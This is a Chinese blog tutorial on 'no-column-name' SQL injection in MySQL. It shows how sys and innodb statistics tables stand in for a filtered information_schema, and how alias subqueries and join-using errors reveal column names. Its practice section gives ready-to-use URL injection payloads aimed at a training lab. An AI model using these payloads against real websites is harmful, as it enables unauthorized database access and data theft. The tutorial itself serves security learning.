sql注入之无列名注入

最新推荐文章于 2024-08-05 21:02:05 发布
最新推荐文章于 2024-08-05 21:02:05 发布
阅读量312 收藏 4
点赞数 6
分类专栏: 网络安全 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68976043/article/details/140932189
版权

目录

一、基础知识

二、平替information_schema库

三、无列名注入

3.1 正常无列名查询:

3.2 子查询:

3.3 实战

一、基础知识

  我们在注入的过程中很多时候利用的就是information_schema这个库获取 table_schema table_name, column_name这些数据库内的信息,而在市面上很多厂商的waf会对其进行过滤和黑名单,而我们在不使用information_schema库,那只能去看看mysql中其他与生俱来的库,这个时候sys库就尤为显眼

二、平替information_schema库

在 Mysql 5.7 版本中新增了 sys.schema ,基础数据 来自于 performance_schema和information_sche两个库中,其本身并不存储数据。

所以 就有了几个可以代替 information_schema 注入的作用

sys.x$schema_table_statistics_with_buffer

sys.x$schema_table_statistics

sys.x$ps_schema_table_statistics_io

查库名: 

 

查表名:

SELECT * FROM x$schema_table_statistics;

但是 sys.schema_auto_increment_columns 这个库有点局限 需要root 才能访问。

类似的,可以利用的表还有 :

mysql.innodb_table_statsmysql.innodb_table_index同样存放有库名表名

总结一下:

sys.schema_auto_increment_columns 

sys.schema_table_statistics_with_buffer

mysql.innodb_table_stats

mysql.innodb_table_index
数据库名/表名/列名未知
寻找列名?
均可代替 information_schema

三、无列名注入

通过上面铺垫我们知道sys库中可以获取到表明和库名,那怎么拿数据呢????或者说列名怎么拿

利用 join-using 注列名

由于join是将两张表的列名给加起来,所以有可能会产生相同的列名,而在使用别名时,是不允出现相同的列名的,因此当它们两个一起使用时,就会爆出相同的列名的名称,从而获得列名

3.1 正常无列名查询:

无列名注入关键 就是要猜测表里有多少个列,要一一对应上,下面例子是有3个列
1,2,3 的作用就是对列起别名,替换为后面无列名注入做准备

select 1,2,3 union select * from users;

3.2 子查询:

接着就可以使用数字来对应列进行查询,如3对应了表里面的pass,这样我们就可以实现无列名注入了

select a.3 from (select 1,2,3 union select * from users) as a;

3.3 实战

我们用sql注入靶场来举例

爆表名
?id=-1' union select 1,2,group_concat(table_name)from sys.schema_auto_increment_columns where table_schema=database()--+
?id=-1' union select 1,2,group_concat(table_name)from sys.schema_table_statistics_with_buffer where table_schema=database()--+

爆字段名
获取第一列的字段名及后面每一列字段名
?id=-1' select * from (select * from users as a join users )
id

?id=-1' union select * from (select * from users as a join users b using(id))c--+

?id=-1' union select * from (select * from users as a join users b using(id,username))c--+
数据库中as作用是起别名,as是可以省略的,为了增加可读性,建议不省略。

凌晨五点的星
关注
  • 6
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Mybatis防止sql注入的实例
08-30
Mybatis防止sql注入的实例 Mybatis框架作为一款半自动化的持久层框架,其sql语句都要我们自己来手动编写,这个时候当然需要防止sql注入。防止sql注入的方法有很多,例如将sql语句全部替换为存储过程的方式,但这种...
sql注入之手工注入示例详解
09-10
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的参数直接构造SQL查询语句时。手工注入是指不依赖自动化工具,而是通过手动构造和尝试不同的SQL语句来探测和利用这种漏洞。本文将深入讲解如何进行...
SQL注入之无列名注入
weixin_46330722的博客
11-10 4087
列名注入概念原理利用 概念 在我们进行sql注入的时候,有时候information_schema这个库可能会因为过滤而无法调用,这是我们就不能通过这个库来查出表名和列名。这时我们可以通过两种方法来查出表名: InnoDb引擎 从MYSQL5.5.8开始,InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中,inndb增加了innodb_index_stats和innodb_table_stats两张表,这两张表中都存储了数据库和其数据表的信息,但是没有存储列名。 sys数据库 在5.7以上
SQL注入之 无列名注入 原理详解
Jay17的博客
09-17 656
SQL注入之 无列名注入 原理详解
【CTF】sql注入之无列名注入的姿势
qq_71467825的博客
11-27 266
顾名思义,就是在不知道列名的情况下进行 sql 注入。在 mysql => 5 的版本中存在一个名为 information_schema 的库,里面记录着 mysql 中所有表的结构。通常,在 mysql sqli 中,我们会通过此库中的表去获取其他表的结构,也就是表名、列名等。但是这个库经常被 WAF 过滤。当我们通过暴力破解获取到表名后,如何利用呢?
SQL注入绕过正则及无列名注入
钟言的博客
12-19 1万+
本篇为SQL注入绕过正则表达式及无列名注入,详细内容包含了select\bNslS]bfrom正则 科学计数法绕过 过滤information 四、无列名注入 1、利用 join-using 注列名 2、无列名查询 五、报错注入7大常用函数 1.ST LatFromGeoHash() (mysql>=5.7.x)payload 2.ST LongFromGeoHash (mysql>=5.7.x) payload 3.GTID (MySQL >= 5.6.X - 显错
sql注入详解
热门推荐
good good study
05-05 20万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
SQL列名注入方法总结(基于union, join)
DawdleD的博客
05-25 2741
本文要点 通过对基于join的无列名注入攻击的研究,本文提出了一种场景以及对应的攻击方法,该攻击方法不需要使用using关键字。 本文整理了相关的博文,将在篇末展示(由于该篇博文是原创博文所以我不会把它们的内容照搬过来,请自行取阅) 一种基于join的无列名注入-1 select Host,User,Select_priv from user where User="root" 在上述场景中用户可以控制的输入是字符串"root",假设的攻击场景中我们可以突破双引号闭合并进行任意sql注入。但是我们
SQL注入绕过之过滤了‘as‘与无列名注入
NLost
06-03 1518
当过滤了as时 当column被过滤的无列名注入 利用sys.schema_auto_increment_columns 新特性
列名&位或注入随记
Aiwin的博客
02-07 881
列名&位或注入随记
SQL注入之报错注入
2301_80661529的博客
02-22 1373
然而,当XPath表达式构造不当,例如包含了非法字符或者尝试执行一个无法解析为有效XPath表达式的字符串时,函数会抛出错误,并且错误信息可能包含有关查询的信息,这便为报错注入提供了机会。floor()报错注入的原因是group by在向临时表插入数据时,由于rand()多次计算导致插入临时表时主键重复,从而报错,又因为报错前concat()中的SQL语句或函数被执行,所以该语句报错且被抛出的主键是SQL语句或函数执行后的结果。这个表名可能不存在,服务器会抛出一个错误消息,可能揭示表是否存在的信息。
sql注入_表名、列名字典
05-06
标题“sql注入_表名、列名字典”提示我们,这个话题将涉及到如何通过SQL注入来获取数据库中的表名和列名。 在描述中,“union select * from 表名字典 union select 列名字典 from 表名”是一个典型的SQL注入攻击...
sql注入过滤字典.txt
10-15
### SQL注入过滤字典知识点详解 #### 一、SQL注入简介 SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在应用程序接收用户输入的地方插入恶意SQL语句,来操控数据库执行非预期的操作。为了防范此类攻击,...
sqlmap sql 注入测试工具
03-06
SQLMap是一款强大的、自动化SQL注入测试工具,专为检测和利用SQL注入漏洞而设计。它可以帮助安全专家或IT从业者在不熟悉目标系统的情况下,轻松发现并利用潜在的SQL注入漏洞,确保系统的安全性。 1. SQL注入简介:...
postgresql 双重排序后 重复项 标识次序
cuisidong1997的博客
08-04 262
在这个查询中,ROW_NUMBER()会为每个product_id分组内的行分配一个唯一的sale_sequence。PARTITION BY product_id表示按product_id分组,ORDER BY sale_date表示在每个分组内按sale_date排序。最外层的ORDER BY product_id, sale_date确定了查询结果的最终排序。一个常见的方法是使用ROW_NUMBER()窗口函数,它会为每个分组内的行分配一个唯一的序号。
SQL Server中CPU使用率过高的排查
主宰
08-05 276
如果sqlserver进程导致CPU使用率过高,则最常见的原因是执行表或索引扫描的查询,其次是排序、哈希操作和循环 (嵌套循环运算符或 WHILE (T-SQL) )。对于安装了sqlserver的服务器,可以先看下任务管理器中sqlserver对cpu的占用情况,确定是否是sqlserver导致cpu消耗过高。从输出中具有最高improvement_measure值的前5或10条建议开始。这些索引对性能有最显著的积极影响。使用以下查询检查是否缺少索引,并应用具有高改进度量值的任何建议索引。
postgresql 分组合并 字段
cuisidong1997的博客
08-04 284
如果你想要合并的不是字符串字段,而是其他类型的字段,比如数字或日期,你也可以使用string_agg,但是需要将这些值转换为字符串。在PostgreSQL中,如果你想要将多个行的字段值合并为一个字段,你可以使用string_agg函数。这个函数可以将同一个组内的指定字段的值连接成一个字符串,并且可以自定义连接符。在这个例子中,array_agg将所有的薪资值收集到一个数组中,然后array_to_string将这个数组转换为一个由逗号分隔的字符串。postgresql 分组合并 字段。
SQL回顾
最新发布
Wincreds的博客
08-05 408
②Cookie 是一种客户端的存储技术,用于在浏览器中存储少量数据。参数包含在请求体中,可以是键值对格式或其他格式,如 JSON。①Session 是一种服务器端的存储技术,用于在用户与网站的交互期间保持用户状态。会话数据通常存储在服务器上的文件或数据库中,可以永久存储用户信息,直到会话过期或被清除。会看到结果,正确密码,与其他的长度不一样,由于网站机制,防爬机制,这里我把密码从666改为了8,节约访问次数。旧密码无所谓,利用 admin’# ,进行修改,修改密码实际上修改的是admin的密码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值